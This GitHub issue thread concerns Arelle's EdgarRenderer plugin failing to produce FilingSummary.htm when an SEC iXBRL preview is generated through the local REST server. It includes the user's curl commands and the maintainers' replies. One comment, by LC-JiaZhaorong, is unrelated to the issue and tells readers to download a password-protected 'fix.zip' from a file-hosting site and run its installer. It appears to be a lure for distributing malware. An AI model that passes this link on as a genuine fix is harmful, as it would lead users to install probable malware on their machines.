### ISSUE TITLE
Missing FilingSummary.htm When Generating SEC iXBRL Preview via Command Line

### ISSUE THREAD

**Issue by iam-alpesh** [Arelle/Arelle#1334]
### What happened?

Hello Team,

I am currently using the command line (Arelle\scripts\startWebServer.bat) to generate an SEC iXBRL preview. When using the GUI with the respective Disclosure System (SEC), I successfully receive a valid .htm file, and the **FilingSummary.htm** opens correctly with all details.

However, when I run the **startWebServer.bat** file and attempt to generate the preview using the following address:

`http://localhost:8080/rest/xbrl/validation?file=D:\ixbrl.zip&efm-pragmatic&media=html&plugins=EdgarRenderer`

I notice that the **FilingSummary.htm** is not present in the output folder.

Request:

Could you please investigate this issue? Additionally, if there is any workaround to ensure the FilingSummary.htm is generated in the output, we would greatly appreciate your guidance.

### Documents

SEC iXBRL package: 
[ixbrl.zip](https://github.com/user-attachments/files/16780787/ixbrl.zip)

Output package:
[Reports.zip](https://github.com/user-attachments/files/16780788/Reports.zip)

### Interface

CLI (arelleCmdLine)

### Version

2.30.26 (Latest)

### Download

GitHub release (bundled Python)

### Operating System

Linux, Windows

**Comment by austinmatherne-wk** [comment]
Hi,

The EdgarRenderer plugin isn't maintained within this repository or by the core Arelle team. Please see the [EdgarRenderer repo](https://github.com/Arelle/EdgarRenderer) and in particular the instructions in the readme for receiving user support.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iam-alpesh** [comment]
Hello,

I have followed these steps to generate the **FilingSummary.htm**:

1.Downloaded the source code from the EdgarRenderer repository.
2.Replaced the contents of D:\Arelle\plugin\EdgarRenderer with the **EdgarRenderer repository** source code.
3.Followed the instructions provided in the [EdgarRenderer GitHub Repository](https://github.com/Arelle/EdgarRenderer).

After starting **startWebServer.bat**, I executed the following command in the command prompt:

`curl -X POST "-HContent-type: application/zip" -T D:\xbrl.zip -o D:\out.zip "http://localhost:8080/rest/xbrl/validation?efm-pragmatic&media=zip&plugins=EdgarRenderer"`

However, I am still unable to generate the FilingSummary.htm. I have tested this process on more than four PCs, and only one PC successfully generated the FilingSummary.htm, while the other three PCs did not.

**Request:**

Could you please assist in troubleshooting this issue? Any insights into why this inconsistency might be occurring would be greatly appreciated.

Thank you for your support.

**Comment by austinmatherne-wk** [comment]
1. Are there any errors or warnings in the logs?
2. Were the generations on the four PCs all using the same XBRL filing, or did the one that succeeded use a different filing from the rest?
